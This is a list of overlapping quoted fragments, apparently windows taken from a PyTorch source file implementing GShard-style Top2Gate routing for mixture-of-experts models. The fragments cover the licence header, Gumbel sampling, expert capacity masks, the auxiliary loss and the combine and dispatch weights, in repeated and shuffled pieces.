"tree. # Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by",
"l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of",
"# Update 2nd's location by accounting for locations of 1st locations2 += torch.sum(mask1,",
"torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc",
"locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc)",
"num_experts, bias=False) def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore",
"def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel = gumbel_map.get(device) if gumbel is",
"top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits,",
"num_classes=num_experts) # Create a mask for 2nd's expert per token using Gumbel-max trick",
"gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s + gates2_s # Avoid divide-by-zero",
"= torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s +",
"= gates.shape[0] num_experts = gates.shape[1] # capacity = 2S/E capacity = 2 *",
"*= torch.lt(locations2, capacity) # Store the capacity location for each token locations1_s =",
"dim=0) l_aux = torch.mean(me * ce) # Remove locations outside capacity from mask",
"Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1) # gates",
"0 # Create a mask for 1st's expert per token indices1_s = torch.argmax(gates,",
"a mask for 1st's expert per token indices1_s = torch.argmax(gates, dim=1) mask1 =",
"for locations of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me",
"top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2",
"Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as described in Gshard_. :: gate =",
"logits.\"\"\" gates = F.softmax(logits, dim=1) # gates has shape of SE num_tokens =",
"capacity = 2S/E capacity = 2 * num_tokens // num_experts assert num_tokens %",
"num_experts) l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size",
"dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0) - 1 # Update 2nd's location",
"capacity from mask mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) # Store",
"dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for 2nd's expert per",
"location for each token locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2",
"% num_experts == 0 # Create a mask for 1st's expert per token",
"Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1) # gates has shape of SE",
"All rights reserved. # # This source code is licensed under the BSD",
"in the root directory of this source tree. # Implementation of Top2Gating described",
"= Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim",
"torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0) - 1 # Update 2nd's",
"import torch from torch import Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable]",
"outside capacity from mask mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) #",
"module which implements Top2Gating as described in Gshard_. :: gate = Top2Gate(model_dim, num_experts)",
"Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel =",
"which implements Top2Gating as described in Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux,",
"2 * num_tokens // num_experts assert num_tokens % num_experts == 0 # Create",
"torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim,",
"gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s = gates1_s + gates2_s #",
"Callable] = {} def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel = gumbel_map.get(device)",
"gates has shape of SE num_tokens = gates.shape[0] num_experts = gates.shape[1] # capacity",
"+ combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module",
"gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates",
"Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_:",
"F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights",
"# LICENSE file in the root directory of this source tree. # Implementation",
"of this source tree. # Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code",
"def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore logits =",
"is inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict,",
"torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits: torch.Tensor)",
"mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1,",
"gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model embedding dimension num_experts",
"capacity) # Store the capacity location for each token locations1_s = torch.sum(locations1 *",
"me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce)",
"affiliates. All rights reserved. # # This source code is licensed under the",
"Compute l_aux me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me",
"torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity buffer locations1",
"= torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity buffer",
"divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s # Calculate",
"Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert",
"device: torch.device) -> Tensor: gumbel = gumbel_map.get(device) if gumbel is None: one =",
"locations of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me =",
"and its affiliates. All rights reserved. # # This source code is licensed",
"l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as described in",
"= torch.mean(me * ce) # Remove locations outside capacity from mask mask1 *=",
"device=device) zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device]",
"F.softmax(logits, dim=1) # gates has shape of SE num_tokens = gates.shape[0] num_experts =",
"locations2_s = torch.sum(locations2 * mask2, dim=1) # Normalize gate probabilities mask1_float = mask1.float()",
"by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple import",
"of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me = torch.mean(gates,",
"num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\",",
"locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2,",
"= F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for 2nd's expert per token using",
"accounting for locations of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux",
"device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] = gumbel return gumbel(shape)",
"Create a mask for 1st's expert per token indices1_s = torch.argmax(gates, dim=1) mask1",
"2nd's location by accounting for locations of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True)",
"per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device)",
"Replace top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1)",
"= torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s # Calculate combine_weights and",
"torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore logits = self.wg(input) return top2gating(logits)",
"from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple import torch from",
"# Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits",
"def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates =",
"This source code is licensed under the BSD license found in the #",
"num_tokens = gates.shape[0] num_experts = gates.shape[1] # capacity = 2S/E capacity = 2",
"-> Tensor: gumbel = gumbel_map.get(device) if gumbel is None: one = torch.tensor(1.0, device=device)",
"torch.sum(locations2 * mask2, dim=1) # Normalize gate probabilities mask1_float = mask1.float() mask2_float =",
"combine_weights = combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask class",
"num_classes=num_experts) # Compute locations in capacity buffer locations1 = torch.cumsum(mask1, dim=0) - 1",
"gates.shape[0] num_experts = gates.shape[1] # capacity = 2S/E capacity = 2 * num_tokens",
"one).rsample # type: ignore gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) ->",
"with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 =",
"dimension num_experts (ints): number of experts in model \"\"\" wg: torch.nn.Linear def __init__(self,",
"= combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module):",
"Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired by Top2GatingOnLogits from lingvo: #",
"torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for 2nd's expert",
"gates, mask2_float) denom_s = gates1_s + gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s,",
"in model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,) -> None:",
"capacity location for each token locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s =",
"locations in capacity buffer locations1 = torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2,",
"the BSD license found in the # LICENSE file in the root directory",
"= torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec +",
"the root directory of this source tree. # Implementation of Top2Gating described in",
"= torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce) #",
"denom_s = gates1_s + gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s",
"1 locations2 = torch.cumsum(mask2, dim=0) - 1 # Update 2nd's location by accounting",
"num_experts == 0 # Create a mask for 1st's expert per token indices1_s",
"# Normalize gate probabilities mask1_float = mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\",",
"Tuple, device: torch.device) -> Tensor: gumbel = gumbel_map.get(device) if gumbel is None: one",
"gates2_s /= denom_s # Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float)",
"model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,) -> None: super().__init__()",
"torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple, device: torch.device)",
"as F gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple, device: torch.device) ->",
"Top2Gating as described in Gshard_. :: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask",
"trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with",
"gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights,",
"model embedding dimension num_experts (ints): number of experts in model \"\"\" wg: torch.nn.Linear",
"its affiliates. All rights reserved. # # This source code is licensed under",
"gates1_s + gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s",
"one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample #",
"num_experts (ints): number of experts in model \"\"\" wg: torch.nn.Linear def __init__(self, model_dim:",
"torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s # Calculate combine_weights and dispatch_mask",
"= logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute",
"1 # Update 2nd's location by accounting for locations of 1st locations2 +=",
"type: ignore gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor,",
"class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as described in Gshard_. :: gate",
"return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\"",
"= torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec",
"Code is inspired by Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable,",
"is None: one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero,",
"from typing import Callable, Dict, Tuple import torch from torch import Tensor import",
"combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask = combine_weights.bool()",
":: gate = Top2Gate(model_dim, num_experts) l_aux, combine_weights, dispatch_mask = gate(input) .. Gshard_: https://arxiv.org/pdf/2006.16668.pdf",
"source tree. # Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is inspired",
"mask2 *= torch.lt(locations2, capacity) # Store the capacity location for each token locations1_s",
"directory of this source tree. # Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf #",
"root directory of this source tree. # Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf",
"on logits.\"\"\" gates = F.softmax(logits, dim=1) # gates has shape of SE num_tokens",
"license found in the # LICENSE file in the root directory of this",
"combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as",
"gumbel_map.get(device) if gumbel is None: one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device)",
"# Replace top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1,",
"Copyright (c) Facebook, Inc. and its affiliates. All rights reserved. # # This",
"denom_s # Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 =",
"locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask =",
"Update 2nd's location by accounting for locations of 1st locations2 += torch.sum(mask1, dim=0,",
"= 2 * num_tokens // num_experts assert num_tokens % num_experts == 0 #",
"mask2, dim=1) # Normalize gate probabilities mask1_float = mask1.float() mask2_float = mask2.float() gates1_s",
"found in the # LICENSE file in the root directory of this source",
"mask for 1st's expert per token indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s,",
"torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec",
"SE num_tokens = gates.shape[0] num_experts = gates.shape[1] # capacity = 2S/E capacity =",
"1st locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me = torch.mean(gates, dim=0)",
"zero = torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] =",
"combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate",
"denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /= denom_s gates2_s /= denom_s # Calculate combine_weights",
"locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return l_aux, combine_weights, dispatch_mask",
"dim=1) # gates has shape of SE num_tokens = gates.shape[0] num_experts = gates.shape[1]",
"expert per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape,",
"+= torch.sum(mask1, dim=0, keepdim=True) # Compute l_aux me = torch.mean(gates, dim=0) ce =",
"Top2GatingOnLogits from lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple import torch",
"from torch import Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] = {}",
"gumbel is None: one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0, device=device) gumbel =",
"ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce) # Remove locations outside",
"locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1) #",
"= combine_weights.bool() return l_aux, combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating",
"-> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def forward(self, input: torch.Tensor) ->",
"https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model embedding dimension num_experts (ints): number of",
"== 0 # Create a mask for 1st's expert per token indices1_s =",
"l_aux me = torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me *",
"# type: ignore gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor,",
"= F.one_hot(indices2_s, num_classes=num_experts) # Compute locations in capacity buffer locations1 = torch.cumsum(mask1, dim=0)",
"for each token locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2 *",
"torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1) # Normalize gate",
"= torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights = combine1_sec + combine2_sec dispatch_mask = combine_weights.bool() return",
"by accounting for locations of 1st locations2 += torch.sum(mask1, dim=0, keepdim=True) # Compute",
"= {} def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel = gumbel_map.get(device) if",
"dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc =",
"logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s = torch.argmax(logits_except1, dim=1) mask2 = F.one_hot(indices2_s, num_classes=num_experts) # Compute locations",
"embedding dimension num_experts (ints): number of experts in model \"\"\" wg: torch.nn.Linear def",
"= torch.cumsum(mask1, dim=0) - 1 locations2 = torch.cumsum(mask2, dim=0) - 1 # Update",
"/= denom_s gates2_s /= denom_s # Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\",",
"# capacity = 2S/E capacity = 2 * num_tokens // num_experts assert num_tokens",
"# Remove locations outside capacity from mask mask1 *= torch.lt(locations1, capacity) mask2 *=",
"import Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape:",
"combine_weights, dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as described in Gshard_.",
"each token locations1_s = torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2 * mask2,",
"denom_s gates2_s /= denom_s # Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s,",
"dim=1) # Normalize gate probabilities mask1_float = mask1.float() mask2_float = mask2.float() gates1_s =",
"gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s, num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\",",
"under the BSD license found in the # LICENSE file in the root",
"* mask1, dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1) # Normalize gate probabilities",
"Calculate combine_weights and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s,",
"token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) #",
"import Callable, Dict, Tuple import torch from torch import Tensor import torch.nn.functional as",
"num_experts assert num_tokens % num_experts == 0 # Create a mask for 1st's",
"= torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits:",
"model_dim: int, num_experts: int,) -> None: super().__init__() self.wg = torch.nn.Linear(model_dim, num_experts, bias=False) def",
"gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] = gumbel return gumbel(shape) def",
"Tuple import torch from torch import Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device,",
"using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) # Replace",
"\"\"\"Gate module which implements Top2Gating as described in Gshard_. :: gate = Top2Gate(model_dim,",
"rights reserved. # # This source code is licensed under the BSD license",
"mask2_float) denom_s = gates1_s + gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps)",
"= gumbel_map.get(device) if gumbel is None: one = torch.tensor(1.0, device=device) zero = torch.tensor(0.0,",
"= gates.shape[1] # capacity = 2S/E capacity = 2 * num_tokens // num_experts",
"forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore logits = self.wg(input)",
"mask mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) # Store the capacity",
"Normalize gate probabilities mask1_float = mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates,",
"mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity) locations2_sc = F.one_hot(locations2_s,",
"typing import Callable, Dict, Tuple import torch from torch import Tensor import torch.nn.functional",
".. Gshard_: https://arxiv.org/pdf/2006.16668.pdf Args: model_dim (int): size of model embedding dimension num_experts (ints):",
"Tensor import torch.nn.functional as F gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple,",
"Tensor, Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1) # gates has",
"dispatch_mask class Top2Gate(torch.nn.Module): \"\"\"Gate module which implements Top2Gating as described in Gshard_. ::",
"- 1 locations2 = torch.cumsum(mask2, dim=0) - 1 # Update 2nd's location by",
"Tensor]: \"\"\"Implements Top2Gating on logits.\"\"\" gates = F.softmax(logits, dim=1) # gates has shape",
"* num_tokens // num_experts assert num_tokens % num_experts == 0 # Create a",
"gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements Top2Gating on",
"model_dim (int): size of model embedding dimension num_experts (ints): number of experts in",
"= gates1_s + gates2_s # Avoid divide-by-zero denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps) gates1_s /=",
"# https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min",
"F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for 2nd's expert per token using Gumbel-max",
"gates.shape[1] # capacity = 2S/E capacity = 2 * num_tokens // num_experts assert",
"this source tree. # Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf # Code is",
"torch.lt(locations2, capacity) # Store the capacity location for each token locations1_s = torch.sum(locations1",
"= torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts) # Create a mask for 2nd's",
"gate probabilities mask1_float = mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float)",
"= torch.tensor(0.0, device=device) gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore gumbel_map[device] = gumbel",
"ce) # Remove locations outside capacity from mask mask1 *= torch.lt(locations1, capacity) mask2",
"and dispatch_mask gates1 = torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc",
"= torch.sum(locations1 * mask1, dim=1) locations2_s = torch.sum(locations2 * mask2, dim=1) # Normalize",
"gumbel_rsample(logits.shape, device=logits.device) # Replace top-expert with min value logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float(\"-inf\")) indices2_s",
"for 1st's expert per token indices1_s = torch.argmax(gates, dim=1) mask1 = F.one_hot(indices1_s, num_classes=num_experts)",
"= mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates, mask2_float) denom_s",
"mask for 2nd's expert per token using Gumbel-max trick # https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/ logits_w_noise =",
"num_classes=capacity) combine1_sec = torch.einsum(\"se,sc->sec\", gates1, locations1_sc) combine2_sec = torch.einsum(\"se,sc->sec\", gates2, locations2_sc) combine_weights =",
"{} def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel = gumbel_map.get(device) if gumbel",
"torch.cumsum(mask2, dim=0) - 1 # Update 2nd's location by accounting for locations of",
"lingvo: # https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple import torch from torch",
"# https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple import torch from torch import",
"mask1.float() mask2_float = mask2.float() gates1_s = torch.einsum(\"se,se->s\", gates, mask1_float) gates2_s = torch.einsum(\"se,se->s\", gates,",
"wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,) -> None: super().__init__() self.wg =",
"gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor: gumbel = gumbel_map.get(device) if gumbel is None:",
"F gumbel_map: Dict[torch.device, Callable] = {} def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor:",
"(int): size of model embedding dimension num_experts (ints): number of experts in model",
"https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477 from typing import Callable, Dict, Tuple import torch from torch import Tensor",
"capacity) mask2 *= torch.lt(locations2, capacity) # Store the capacity location for each token",
"\"\"\" wg: torch.nn.Linear def __init__(self, model_dim: int, num_experts: int,) -> None: super().__init__() self.wg",
"= torch.einsum(\"s,se->se\", gates1_s, mask1_float) gates2 = torch.einsum(\"s,se->se\", gates2_s, mask2_float) locations1_sc = F.one_hot(locations1_s, num_classes=capacity)",
"mask1 *= torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) # Store the capacity location",
"torch.mean(gates, dim=0) ce = torch.mean(mask1.float(), dim=0) l_aux = torch.mean(me * ce) # Remove",
"torch.lt(locations1, capacity) mask2 *= torch.lt(locations2, capacity) # Store the capacity location for each",
"gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: \"\"\"Implements",
"ignore gumbel_map[device] = gumbel return gumbel(shape) def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]:",
